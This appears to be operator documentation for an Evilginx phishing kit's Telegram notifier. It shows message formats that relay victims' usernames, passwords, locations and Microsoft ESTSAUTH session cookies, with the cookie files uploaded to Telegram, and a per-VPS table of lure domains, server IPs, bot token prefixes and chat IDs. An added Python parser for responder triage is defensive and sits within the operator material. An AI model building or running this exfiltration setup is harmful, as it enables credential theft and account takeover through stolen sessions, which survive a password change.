Notification Format
Three messages per capture — VISITOR text + CAPTURE text + cookies JSON file
Message 1 — VISITOR
Fires the moment anyone lands on the lure, before they type anything.
VISITOR — office-auth.com
Session #3
IP: 197.210.54.101
Location: Lagos, Nigeria | MTN Nigeria
Device: iPhone iOS 18.5 / Safari
Lure: https://login.office-auth.com/jDabnEAR
Time: 2026-06-02 14:23 WAT
Message 2 — CAPTURE
CAPTURE — office-auth.com
Session #3
User: victim@company.com
Pass: Passw0rd!
IP: 197.210.54.101
Location: Lagos, Nigeria | MTN Nigeria
Device: Windows 10/11 / Chrome 124
Cookies: 3 captured
ESTSAUTH keys: ESTSAUTH, ESTSAUTHPERSISTENT
Time: 2026-06-02 14:24 WAT
Message 3 — File
session_N_cookies.json is sent as a Telegram document upload, with full cookie values and no truncation. ESTSAUTHPERSISTENT alone is 800+ chars and the Telegram text cap is 4096, while a file has no limit.
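For responders working from an exported chat of a bot like this, the following added example (not part of the original page) parses the VISITOR and CAPTURE text format shown above and lists the response each captured account needs. The sample messages are constructed, and parse_messages and triage are hypothetical names.

```python
import re

# Added example: constructed sample in the page's message format; all names are hypothetical.
SAMPLE = """\
VISITOR — lure.example
Session #3
Time: 2026-06-02 14:23 WAT
CAPTURE — lure.example
Session #3
User: alice@example.com
Cookies: 3 captured
ESTSAUTH keys: ESTSAUTH, ESTSAUTHPERSISTENT
Time: 2026-06-02 14:24 WAT
CAPTURE — lure.example
Session #4
User: bob@example.com
Cookies: 0 captured
"""

HEADER = re.compile(r"^(VISITOR|CAPTURE) — (\S+)$")

def parse_messages(text):
    """Split an exported chat into one dict per VISITOR/CAPTURE message."""
    records, cur = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        m = HEADER.match(line)
        if m:
            cur = {"type": m.group(1), "domain": m.group(2)}
            records.append(cur)
        elif cur is not None and line.startswith("Session #"):
            cur["session"] = int(line[len("Session #"):])
        elif cur is not None and ": " in line:
            key, value = line.split(": ", 1)
            cur[key] = value
    return records

def triage(records):
    """Map each captured user to the response its CAPTURE message implies."""
    actions = {}
    for r in records:
        if r["type"] != "CAPTURE" or "User" not in r:
            continue
        keys = [k.strip() for k in r.get("ESTSAUTH keys", "").split(",") if k.strip()]
        # A stolen session cookie stays usable after a password change, so revoke sessions too.
        actions[r["User"]] = "reset password + revoke sessions" if keys else "reset password"
    return actions

if __name__ == "__main__":
    for user, action in triage(parse_messages(SAMPLE)).items():
        print(f"{user}: {action}")
```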
Seen File Logic
v{sid} # fires once on new session (VISITOR)
c{sid} # fires when username or tokens appear (CAPTURE)
rm /root/.evilginx_notify_seen && pm2 restart evilginx-notify # reset for testing
Per-VPS Reference
| VPS | Domain | Bot token prefix | Chat ID |
|---|---|---|---|
| 62.171.153.214 | ms.appsession.org | 8622630606 | 6301139964 |
| 80.78.18.72 | office-auth.com | 8419178095 | 7100847959 |